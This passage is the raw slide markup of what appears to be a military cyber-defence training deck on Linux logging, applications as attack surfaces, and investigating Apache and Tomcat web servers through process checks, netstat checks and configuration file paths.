              <a:t>Fedora, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>RedHat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rsyslogd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OpenSuSE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (syslog-ng), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>various </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sysklogd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Where do we start?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Linux Logging</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96" t="2695"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="865843" y="3623038"/>
            <a:ext cx="10441775" cy="2556443"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16393495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Systemd-Journald</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> captures syslog messages, Kernel log messages initial RAM disk and early boot messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Journald</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> logs are by default not persistent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Stored </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/run/log/journal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(volatile)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>May duplicate logs from the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rsyslogd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>syslog-ng</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sysklogd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Application logs: It depends!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Linux Logging</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19149352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0" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="565666" y="1595441"/>
            <a:ext cx="11176000" cy="4795837"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intro to Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux Operating System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Key Linux components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User space and Kernel space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux permissions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux logging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Useful command line interface syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2258396899"/>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will walk through different Linux applications in a Linux environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Applications will vary depending on Linux distribution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Intent is to arm you with basic knowledge to apply and think dynamically answering the following questions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How can I tell it is installed on a Linux host?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How can I tell it is running on a Linux host?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How can I find and parse the running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Are there common misconfigurations that may allow access or escalation?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Where can I find log activity for the application?</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Applying Knowledge</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="508144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i="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Intro to Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Linux Operating System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Key Linux components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>User space and Kernel space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Linux files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Linux permissions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Linux logging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Linux application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Useful command line interface syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7180" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="746553176"/>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3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7852360" y="4642704"/>
            <a:ext cx="4119738" cy="1865586"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Applications are a program or collection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>of programs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to help users perform specific </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>tasks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or actions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Challenges created by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>applications</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>surfaces </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>vectors</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Diversity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Proprietary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>software</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Applications running on system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>communicate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kernel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>via system calls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Applications</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Google Shape;98;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7852360" y="4642704"/>
            <a:ext cx="4119738" cy="651897"/>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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9034464" y="2778385"/>
            <a:ext cx="3152936" cy="1193984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
                    <a:schemeClr val="bg2">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Falconer Weapon System</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="50800" dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:outerShdw>
              </a:effectLst>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91216" y="2716852"/>
            <a:ext cx="1243248" cy="1424325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8729664" y="1485413"/>
            <a:ext cx="3285640" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
                    <a:schemeClr val="bg2">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>GCCS-AF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6000" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="50800" dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18512276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Apache: Powerful web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tomcat: Application server designed to execute Java servlets and render web pages that use Java Server page coding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>During an investigation, we suspect a Web server … what do we check?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Process and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> checks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="330136" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web Servers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Google Shape;526;p54"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1240310" y="5103075"/>
            <a:ext cx="9760649" cy="1053950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Google Shape;527;p54"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1240310" y="4224200"/>
            <a:ext cx="9745150" cy="878875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37806455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Default installation of files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/apache2/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>httpd.conf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/apache2/apache2.conf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>httpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>httpd.conf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>httpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>httpd.conf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
